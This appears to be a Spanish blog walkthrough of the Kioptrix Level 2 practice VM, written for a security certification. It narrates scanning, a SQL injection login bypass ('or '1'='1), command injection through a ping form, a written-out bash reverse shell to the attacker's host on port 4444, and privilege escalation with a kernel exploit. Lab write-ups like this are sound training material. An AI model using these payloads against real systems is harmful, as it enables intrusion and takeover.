jueves, 25 de mayo de 2017

Walkthrough - Máquina Vulnerable KIOPTRIX lvl 1.1 -


Me gustaría comenzar las entradas de este humilde blog aprovechando algunas de mis prácticas que realicé para una certificación de seguridad que cursé recientemente.



En este caso concreto se trata de una de las máquina vulnerable Kioptrix, más concretamente al segundo nivel, y antes de nada decir que siempre hay mas de un modo de "jugar" con estas máquina y sus vulnerabilidades.. no hay un único camino bueno y este es solo uno de los muchos que puedes seguir.

Manos a la obra!! Una vez descargada la máquina virtual desde su propia web y arrancada la misma nos ponemos al lio!


En primer lugar lanzamos el comando netdiscover desde KALI para localizar la IP de la Kioptrix 2 y poder meternos en faena



Analizamos en primera instancia con nMap los servicios y versiones que ofrece la máquina, obteniendo como resultado que se trata de OS Linux y algún que otro dato más de interés



Lanzamos un segundo escaneo más completo con nMap para obtener mas información sobre las versiones de los servicios que están corriendo en la máquina.



Podemos observar que tiene un servidor web Apache corriendo (http y https), si tratamos acceder desde el navegador a la dirección IP de la máquina, encontraremos una pantalla de login!



Utilizamos wfuzz para tratar de sacar más directorios accesibles del servicio web por si "suena la campana". Obtenemos dos de ellos pero no encontramos nada verdaderamente significante dentro de ellos.



Igualmente también utilizamos NIKTO para detectar posibles vulnerabilidades del la versión del servicio web (Apache) que está ejecutándose



Como nunca está de más en estas lides... tratamos (sin éxito alguno) entrar con root/root, admin/admin, admin/1234 y varias combinaciones de usuarios/contraseñas “por defecto”.
En esa lñinea de "ensayo y error" tratamos de utilizar la sentencia 'or '1'='1 para determinar si es existe algún tipo vulnerabilidad a sql inhection y… funciona!  Observaremos como ellos nos da acceso al index de la web!



La web parece ofrecer un servicio que meramente realiza “ping” sobre la IP/dominio que rellenes en el “box”, mostrándonos su resultado en una nueva pestaña del navegador.



Si observamos con detenimiento, al final del mensaje podemos leer “pipe 2”... quizás podría significar que es vulnerable a la utilización de "pipes" en Linux! Probamos a concatenar comando en la petición usando el separador “;” y vemos que la base de datos nos da respuesta al comando solicitado junto con el ping.



Seguimos probando suerte y apovechándonos de lo descubierto y lanzamos de nuevo una consulta descubriendo que somos usuario apache, del grupo apache

Como ya conocemos que se trata de un OS Linux intento acceder al archivo PASSWD a través del formulario y… FUNCIONA!!!



Lamentablemente nuestro usuario es muy limitado y de solo lectura



No obstante intentamos aprovechar lo avanzado hasta el momento parta obtener una Shell y tratar de ganar privilegios desde ella, poara lo cual se nos ocurre utilizar Netcat en KALI para poner un puerto a la escucha y tratar de lanzar la Shell de manera “inversa” desde el formulario web vulnerable (sentencia ;127.0.0.1;bash -i>&/dev/tcp/192.168.1.220/4444 0>&1).





Una vez dentro toca buscar la manera de escalar privilegios, llegados a este punto (y con la recolección inicial de información) buscamos vulnerabilidades de las versiones de componentes corriendo en la máquina, atisbamos una posible “luz al final del túnel” al encontrar cierto exploit para el kernel 2.6.9.55 de Linux que tiene la máquina objetivo.



Después de descargarlo e indagar por internet sobre su utilización… resulta no ser tan sencillo el asunto como ejecutarlo y listo… básicamente entendemos que el mejor procedimiento es descargarlo en la maquina victima, en el directorio /temp que es el único que aparentemente tenemos permisos, pero obtengo errores del certificado SSL de la web exploit-db.



Como lo tenemos descargado en KALI se nos ocurre levantar el servicio Apache del mismo para servir el archivo desde él y “cogerlo” desde ahí con mayor éxito y sin problemas de certificado… por fortuna funciona!!!





Una vez descargado el exploit en la máquina objetivo tenemos que compilarlo



Y ahora a ejecutarlo! Pero parece que tenemos problemas de permisos



Modificamos los permisos del ejecutable ya compilado con CHMOD y ahora SI nos deja ejecutarlo!



Al ejecutarlo recibimos el mensaje “check ur id” de modo que, lo hacemos y... SORPRESA!!! Somos ROOT!!!



Cambiamos la clave del usuario root por la de CPHE1234 y asi asegurarnos el acceso a la máquina cuando deseemos



Iniciamos sesión con root/CPHE1234 en la máquina Kioptrix




RETO SUPERADO!!!!!!!!!!!!!!!!!!

1 comentarios: